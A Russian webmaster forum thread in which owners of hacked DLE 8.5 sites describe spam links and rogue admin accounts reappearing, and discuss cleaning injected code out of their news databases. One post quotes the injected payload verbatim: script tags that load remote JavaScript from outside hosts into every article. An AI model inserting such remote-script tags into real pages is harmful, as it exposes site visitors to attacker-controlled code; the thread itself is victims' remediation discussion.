- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
pq777pq, читать, думать, анализировать
Отлично сделал бекап б.д., теперь залатаем дырочки
Здраствуйте уважаемые форумчане!
Прошу - помогите плиз!😕
У меня три сайта, все были на ДЛЕ 8.5 и все находятся на одном хостинге
Вчера зашёл на один из-них, и понял что начались серьёзные проблемы.
Проблема в том, что в ниже перечисленных местах, при каждом переходе по закладках - появляются ссылки нескольких сайтов 4 или 5-ти. Ссылка выглядит обычно (<a href=http://ля-ля-ля/ >скачать книги бесплатно без регистрации</a>).
- на сайте между новостями;
- в админке закладка "Настройки системы" (в поле - "Ключивые слова" и "Причина отключения сайта")
- в закладке "Добавить новость" (в поле - "Короткая новость и "Полная новость").
Пытался удалять но они появляются после каждого перехода!😮
При этом вся эта гадость на всех моих сайтах. Все они на дле 8.5.
А и ещё я пробовал ставить на Wordpress - та же самая ситуация.
Прошу подскажите что мне нужно сделать чтобы это всё исправить!!!! Зарание благодарю!
А как такую хрень удалить?
Запрос автозамены его суку не берет
У меня тоже было, что на сайте появлялись левые админы. Все время удалял и банил, но безтолку. Потом поставил упрощенную регистрацию на сайте (без подтверждения почты) и админы пропали.
Но через неделю обнаружил у себя посторонний код в каждой новости да еще и в краткой и полной
<script src="http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script><script src="http://zheenix.msk.ru/f71879559bcfc86dd2ddeb0cf71e135c.js" type="text/javascript"></script><script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>
стал удалять через админку сайта поиск и замена, удалил все кроме такого кода 76403bc14134a2b49668b579a3b33ae6, потому что он разный в каждой новости, а крыжить 40000 тыс новостей в ручную не хотелось. Не успел удалить, как появился другой подобный код, только ссылки были на другой сайт юкоза. И еще заметил, что полная новость не полностью, а лишь тот кусочек что и в краткой новости.
База новостей была размером 150 метров. Попытался открыть вордом, но это было не реально. Пришлось открывать блокнотом с плагинами и по частям копировать в ворд, а там уже через поиск и замену удалять. С ворда копировал в другой файл, который потом открыл через phpadmin и импортировал все обратно. Поставил заплатки. Посмотрим что будет.
psash добавил 10.01.2011 в 12:39
Если кому нужна помощь, помогу за символическую плату в удалении такого говна с новостей
А и ещё я пробовал ставить на Wordpress - та же самая ситуация.
Это как это ? о_О
Если кому нужна помощь, помогу за символическую плату в удалении такого говна с новостей
Интересно, сколько Вы потратите время на базу в 130 000 новостей и размером в 1,03 Гб ?
php/perl + регулярки не отменяли вроде как. Сделать дамп и работать с текст. файлом. Хотя можно и в консоли)
никто не знает как мне помочь?
запросом автозамены я так понял не берет из за символов \"
php/perl + регулярки не отменяли вроде как. Сделать дамп и работать с текст. файлом. Хотя можно и в консоли)
Молодец, что знаешь php и все остальное, хвастаться можешь. А как быть кто не знает?! Работать только с дампом!
psash добавил 10.01.2011 в 15:48
никто не знает как мне помочь?
запросом автозамены я так понял не берет из за символов \"
А где пользуешься автозаменой? На сайте в админке или еще где? Выложи то что нужно убрать!
psash добавил 10.01.2011 в 15:49
Это как это ? о_О
Интересно, сколько Вы потратите время на базу в 130 000 новостей и размером в 1,03 Гб ?
Столько, сколько этого потребуется!
может у вас движок дырявый или старая 8.2 с фиксами..